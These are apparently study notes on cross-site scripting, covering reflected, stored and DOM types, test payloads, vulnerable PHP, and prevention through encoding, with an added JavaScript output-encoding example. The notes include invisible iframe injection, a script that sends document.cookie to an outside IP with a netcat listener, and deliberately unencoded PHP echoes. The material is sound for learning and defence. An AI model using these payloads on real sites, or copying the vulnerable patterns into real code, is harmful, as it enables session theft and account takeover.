[XSS] Cross Site Scripting
Links
https://portswigger.net/web-security/cross-site-scripting
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A7-Cross-Site_Scripting_(XSS)
YouTube
https://www.youtube.com/watch?v=3pXeSkM7m3M&list=PLZOToVAK85MoYN8LF4vsGNtgwmLinMnW3
https://www.youtube.com/watch?v=3pXeSkM7m3M&list=PLZOToVAK85MqxEPGXA80NPMZEczZfA9ej&index=60
https://www.youtube.com/watch?v=I0SusAlT1wY&list=PLZOToVAK85MqxEPGXA80NPMZEczZfA9ej&index=63
XSS vulnerabilities are caused by unsanitized user input that is then rendered into a web page as HTML. They allow attackers to inject client-side scripts, such as JavaScript, into web pages viewed by other users.
Although XSS attacks do not directly compromise a machine, they can still have significant impact, such as cookie stealing and authentication bypass, redirecting the victim's browser to a malicious HTML page, and more.
**Only JavaScript or VBScript embedded in auth.y.com can read cookies belonging to auth.y.com** (same-origin policy)
reflected = non-persistent; the payload is echoed back immediately and lives in the HTTP request itself
stored = persistent; the payload is stored by the web application and served to later visitors
DOM XSS = lives within the DOM environment, in the page's client-side script itself, and does not reach server-side code
Camouflaging the URL (ways the link reaches a victim)
tinyurl
iframes
link in a targeted email
<plaintext> tag/payload for testing
alert('abc');alert(document.cookie)
String.fromCharCode(xxx, xxx, xxx)
Payload example
<script>
x = '<!--<script>' < /script>/ - alert(1)
</script>
Vulnerable PHP code (reflected XSS via $_GET['name'])
<?php
// user input is echoed straight into the HTML without any encoding
echo '<h4>Hello ' . $_GET['name'] . '</h4>';
?>
Browser Redirection and IFRAME Injection
<iframe SRC="http://$ip/report" height="0" width="0"></iframe>
invisible iframe
<iframe src="http://<me>:<myport>/something" height="0" width="0"></iframe>
Stealing Cookies and Session Information
<iframe src="http://10.11.0.5/report" height="0" width="0"></iframe>
<script> new Image().src="http://10.11.0.126/bogus.php?output="+document.cookie; </script>
nc -nlvp 80 (listener that receives the request carrying the cookie)
Unencoded input inside an attribute (vulnerable attribute context):
<img src="logo.png" alt="<?= $_GET['name'] ?>">
Exploitation with Beef
https://www.youtube.com/watch?v=gU_zv8HIG2g&list=PLZOToVAK85MqxEPGXA80NPMZEczZfA9ej&index=177
https://www.youtube.com/watch?v=t-44ZsaeIQE&list=PLZOToVAK85MqxEPGXA80NPMZEczZfA9ej&index=199
Inject the BeEF hook script into the web page via XSS
With event handlers
abc" onmouseover=alert("XSS") "
onclick, onload, onerror, etc.
<a onmouseover="alert('xss')">xss link</a>
<IMG SRC=# onmouseover="alert('xss')">
<IMG SRC=/ onerror="alert('xss')">
How to prevent XSS
Encoding: < becomes &lt; (output encoding for the context the data lands in)
Filtering: <script> becomes script (tags are stripped)
Validating: compare input against a whitelist
Sanitization: combination of escaping, filtering and validation
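The "Encoding" bullet in practice, as an added example that is not part of these notes: context-aware output encoders applied to the two vulnerable PHP patterns on this page (echo into the HTML body, and $_GET['name'] inside alt="..."), plus the JavaScript-string context the payload example relies on. The function names are my own, and the payload strings are the notes' own, used here only as constructed test input.

```javascript
// Added example (not from the notes): context-aware output encoding.
// Function names are assumptions; payloads are the notes' own, as test input.

// HTML body/text context: neutralise the characters that open or close markup.
function encodeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// HTML attribute context: encode every non-alphanumeric code point, so a
// quote in the input can never close alt="..." and start onmouseover=.
function encodeHtmlAttr(s) {
  return String(s).replace(/[^A-Za-z0-9]/gu,
    (c) => `&#x${c.codePointAt(0).toString(16)};`);
}

// JavaScript string context (var x = '...' inside <script>): \xHH / \u{...}
// escapes, so neither a quote nor </script> in the data can end the string
// or the script block (which is what the "Payload example" above relies on).
function encodeJsString(s) {
  return String(s).replace(/[^A-Za-z0-9]/gu, (c) => {
    const cp = c.codePointAt(0);
    return cp < 0x100 ? `\\x${cp.toString(16).padStart(2, '0')}`
                      : `\\u{${cp.toString(16)}}`;
  });
}

// Safe counterparts of the two PHP snippets in the notes.
function renderGreeting(name) {   // was: echo '<h4>Hello ' . $_GET['name'] . '</h4>';
  return `<h4>Hello ${encodeHtml(name)}</h4>`;
}
function renderLogo(altText) {    // was: <img src="logo.png" alt="<?= $_GET['name'] ?>">
  return `<img src="logo.png" alt="${encodeHtmlAttr(altText)}">`;
}
function renderScriptVar(value) { // data handed to a <script> block as a JS string
  return `<script>var x = '${encodeJsString(value)}';</script>`;
}

// Quick self-check with the notes' own payloads (constructed input).
const bodyPayload = "<script>alert(document.cookie)</script>";
const attrPayload = 'abc" onmouseover=alert("XSS") "';
console.log(renderGreeting(bodyPayload));
console.log(renderLogo(attrPayload));
console.log(renderScriptVar("</script><script>alert(1)</script>"));
```

Filtering alone (stripping `<script>`) is weaker than this because the event-handler payloads above contain no script tag at all; encoding for the right context defeats all three.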